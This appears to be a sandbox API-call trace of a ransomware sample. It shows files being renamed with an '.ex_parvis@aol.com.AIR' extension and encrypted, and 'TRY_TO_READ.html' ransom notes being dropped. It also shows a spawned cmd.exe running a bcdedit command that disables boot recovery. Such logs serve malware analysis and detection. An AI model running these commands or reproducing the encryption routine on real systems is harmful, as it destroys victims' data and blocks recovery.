lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd8233660, ftCreationTime.dwHighDateTime=0x1d4c950, ftLastAccessTime.dwLowDateTime=0xb54bbaf0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb54bbaf0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3845b0 [0173.303] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\iLdqVio\\ISChTj\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b 7s0g0p 7\\ildqvio\\ischtj\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0173.305] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\iLdqVio\\oDWAkj_iS9Ghf1A1\\TRY_TO_READ.html" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b 7s0g0p 7\\ildqvio\\odwakj_is9ghf1a1\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0173.307] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.307] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.307] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\iLdqVio\\Ln5s15SNifDpS7O.avi", dwFileAttributes=0x80) returned 1 [0173.307] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\iLdqVio\\Ln5s15SNifDpS7O.avi") returned 76 [0173.307] GetProcessHeap () returned 0x2e0000 [0173.307] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xfe) returned 0x363b58 [0173.307] lstrcpyW (in: lpString1=0x363b58, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\iLdqVio\\Ln5s15SNifDpS7O.avi" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\iLdqVio\\Ln5s15SNifDpS7O.avi") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\iLdqVio\\Ln5s15SNifDpS7O.avi" [0173.307] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\iLdqVio\\Ln5s15SNifDpS7O.avi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\iLdqVio\\Ln5s15SNifDpS7O.avi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\iLdqVio\\Ln5s15SNifDpS7O.avi.12781717671972518758.ex_parvis@aol.com.AIR" [0173.307] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\iLdqVio\\Ln5s15SNifDpS7O.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b 7s0g0p 7\\ildqvio\\ln5s15snifdps7o.avi"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\iLdqVio\\Ln5s15SNifDpS7O.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b 7s0g0p 7\\ildqvio\\ln5s15snifdps7o.avi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.311] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\B 7S0G0p 7\\iLdqVio\\Ln5s15SNifDpS7O.avi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\b 7s0g0p 7\\ildqvio\\ln5s15snifdps7o.avi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0173.311] GetProcessHeap () returned 0x2e0000 [0173.311] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363b58 | out: hHeap=0x2e0000) returned 1 [0173.311] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=82556) returned 1 [0173.311] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1427c [0173.311] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.312] GetProcessHeap () returned 0x2e0000 [0173.312] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.312] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.312] WriteFile (in: hFile=0x640, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.312] WriteFile (in: hFile=0x640, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.313] WriteFile (in: hFile=0x640, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.313] ReadFile (in: hFile=0x640, lpBuffer=0x3110048, nNumberOfBytesToRead=0x1427c, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3110048*, lpNumberOfBytesRead=0x2acf9c8*=0x1427c, lpOverlapped=0x0) returned 1 [0173.316] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xb5554070, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb5554070, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3845f0 [0173.316] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Adobe\\Acrobat\\10.0\\Replicate\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\adobe\\acrobat\\10.0\\replicate\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0173.319] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xb5554070, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0xb5554070, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x384630 [0173.320] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0173.320] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0173.320] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp", dwFileAttributes=0x80) returned 1 [0173.321] lstrlenW (lpString="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp") returned 67 [0173.321] GetProcessHeap () returned 0x2e0000 [0173.321] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xec) returned 0x32f900 [0173.321] lstrcpyW (in: lpString1=0x32f900, lpString2="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" | out: lpString1="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp") returned="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" [0173.321] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.12781717671972518758.ex_parvis@aol.com.AIR" [0173.321] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp"), lpNewFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0173.325] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10116_MUI.msp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10116_mui.msp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x648 [0173.325] GetProcessHeap () returned 0x2e0000 [0173.325] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f900 | out: hHeap=0x2e0000) returned 1 [0173.325] GetFileSizeEx (in: hFile=0x648, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=17420288) returned 1 [0173.325] SetFilePointer (in: hFile=0x648, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x109d000 [0173.325] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0173.325] GetProcessHeap () returned 0x2e0000 [0173.325] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0173.325] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0173.325] WriteFile (in: hFile=0x648, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0173.326] WriteFile (in: hFile=0x648, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0173.326] WriteFile (in: hFile=0x648, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0173.327] ReadFile (in: hFile=0x648, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x109d000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x33d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x109d000, lpOverlapped=0x0) returned 1 [0174.643] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0174.644] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0174.644] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp", dwFileAttributes=0x80) returned 1 [0174.644] lstrlenW (lpString="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp") returned 67 [0174.644] GetProcessHeap () returned 0x2e0000 [0174.645] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xec) returned 0x32f868 [0174.645] lstrcpyW (in: lpString1=0x32f868, lpString2="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" | out: lpString1="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp") returned="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" [0174.645] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.12781717671972518758.ex_parvis@aol.com.AIR" [0174.645] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp"), lpNewFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0174.647] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\Reader_10.0.0\\AdbeRdrUpd10110_MUI.msp.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\adobe\\arm\\reader_10.0.0\\adberdrupd10110_mui.msp.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x648 [0174.647] GetProcessHeap () returned 0x2e0000 [0174.647] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x32f868 | out: hHeap=0x2e0000) returned 1 [0174.647] GetFileSizeEx (in: hFile=0x648, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=17707008) returned 1 [0174.647] SetFilePointer (in: hFile=0x648, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x10e3000 [0174.647] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0174.647] GetProcessHeap () returned 0x2e0000 [0174.647] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0174.647] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0174.647] WriteFile (in: hFile=0x648, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0174.648] WriteFile (in: hFile=0x648, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0174.649] WriteFile (in: hFile=0x648, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0174.649] ReadFile (hFile=0x648, lpBuffer=0x33d0020, nNumberOfBytesToRead=0x10e3000, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0) Thread: id = 164 os_tid = 0x3d0 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x15f04000" os_pid = "0x3f8" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x9b8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dc17" [0xc000000f], "LOCAL" [0x7] Thread: id = 8 os_tid = 0x880 Thread: id = 9 os_tid = 0x76c Thread: id = 10 os_tid = 0x758 Thread: id = 11 os_tid = 0x74c Thread: id = 12 os_tid = 0x72c Thread: id = 13 os_tid = 0x71c Thread: id = 14 os_tid = 0x718 Thread: id = 15 os_tid = 0x638 Thread: id = 16 os_tid = 0x154 Thread: id = 17 os_tid = 0x150 Thread: id = 18 os_tid = 0x12c Thread: id = 19 os_tid = 0x120 Thread: id = 20 os_tid = 0x3fc Thread: id = 24 os_tid = 0xaa0 Thread: id = 55 os_tid = 0x274 Thread: id = 57 os_tid = 0x594 Thread: id = 58 os_tid = 0x884 Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x1f4c5000" os_pid = "0x4a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9b8" cmd_line = "/C bcdedit /set {default} bootstatuspolicy ignoreallfailures" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 25 os_tid = 0x838 [0098.841] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efde0 | out: lpSystemTimeAsFileTime=0x2efde0*(dwLowDateTime=0x8f015cb0, dwHighDateTime=0x1d5956e)) [0098.841] GetCurrentProcessId () returned 0x4a0 [0098.841] GetCurrentThreadId () returned 0x838 [0098.841] GetTickCount () returned 0x1152de4 [0098.841] QueryPerformanceCounter (in: lpPerformanceCount=0x2efde8 | out: lpPerformanceCount=0x2efde8*=21912639255) returned 1 [0098.842] GetModuleHandleW (lpModuleName=0x0) returned 0x4acb0000 [0098.842] __set_app_type (_Type=0x1) [0098.842] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4acd7810) returned 0x0 [0098.842] __getmainargs (in: _Argc=0x4acfa608, _Argv=0x4acfa618, _Env=0x4acfa610, _DoWildCard=0, _StartInfo=0x4acde0f4 | out: _Argc=0x4acfa608, _Argv=0x4acfa618, _Env=0x4acfa610) returned 0 [0098.843] GetCurrentThreadId () returned 0x838 [0098.843] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x838) returned 0x3c [0099.071] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0099.071] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0099.071] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0099.072] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0099.072] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efd78 | out: phkResult=0x2efd78*=0x0) returned 0x2 [0099.072] VirtualQuery (in: lpAddress=0x2efd60, lpBuffer=0x2efce0, dwLength=0x30 | out: lpBuffer=0x2efce0*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.072] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2efce0, dwLength=0x30 | out: lpBuffer=0x2efce0*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.072] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2efce0, dwLength=0x30 | out: lpBuffer=0x2efce0*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.072] VirtualQuery (in: lpAddress=0x1f4000, lpBuffer=0x2efce0, dwLength=0x30 | out: lpBuffer=0x2efce0*(BaseAddress=0x1f4000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.072] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2efce0, dwLength=0x30 | out: lpBuffer=0x2efce0*(BaseAddress=0x2f0000, AllocationBase=0x2f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0099.072] GetConsoleOutputCP () returned 0x1b5 [0099.072] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4acebfe0 | out: lpCPInfo=0x4acebfe0) returned 1 [0099.072] SetConsoleCtrlHandler (HandlerRoutine=0x4acd3184, Add=1) returned 1 [0099.072] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.072] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0099.073] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.073] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4acde194 | out: lpMode=0x4acde194) returned 1 [0099.073] _get_osfhandle (_FileHandle=1) returned 0x7 [0099.073] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0099.073] _get_osfhandle (_FileHandle=0) returned 0x3 [0099.073] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4acde198 | out: lpMode=0x4acde198) returned 1 [0099.073] _get_osfhandle (_FileHandle=0) returned 0x3 [0099.073] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0099.073] GetEnvironmentStringsW () returned 0x408b00* [0099.073] GetProcessHeap () returned 0x3f0000 [0099.073] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xa7c) returned 0x409590 [0099.074] FreeEnvironmentStringsW (penv=0x408b00) returned 1 [0099.074] GetProcessHeap () returned 0x3f0000 [0099.074] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0x8) returned 0x408980 [0099.074] GetEnvironmentStringsW () returned 0x408b00* [0099.074] GetProcessHeap () returned 0x3f0000 [0099.074] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x8, Size=0xa7c) returned 0x40a020 [0099.074] FreeEnvironmentStringsW (penv=0x408b00) returned 1 [0099.074] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2eec38 | out: phkResult=0x2eec38*=0x44) returned 0x0 [0099.074] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2eec30, lpData=0x2eec50, lpcbData=0x2eec34*=0x1000 | out: lpType=0x2eec30*=0x0, lpData=0x2eec50*=0x18, lpcbData=0x2eec34*=0x1000) returned 0x2 [0099.074] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2eec30, lpData=0x2eec50, lpcbData=0x2eec34*=0x1000 | out: lpType=0x2eec30*=0x4, lpData=0x2eec50*=0x1, lpcbData=0x2eec34*=0x4) returned 0x0 [0099.074] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2eec30, lpData=0x2eec50, lpcbData=0x2eec34*=0x1000 | out: lpType=0x2eec30*=0x0, lpData=0x2eec50*=0x1, lpcbData=0x2eec34*=0x1000) returned 0x2 [0099.074] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2eec30, lpData=0x2eec50, lpcbData=0x2eec34*=0x1000 | out: lpType=0x2eec30*=0x4, lpData=0x2eec50*=0x0, lpcbData=0x2eec34*=0x4) returned 0x0 [0099.074] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2eec30, lpData=0x2eec50, lpcbData=0x2eec34*=0x1000 | out: lpType=0x2eec30*=0x4, lpData=0x2eec50*=0x40, lpcbData=0x2eec34*=0x4) returned 0x0 [0099.074] RegQueryValueExW 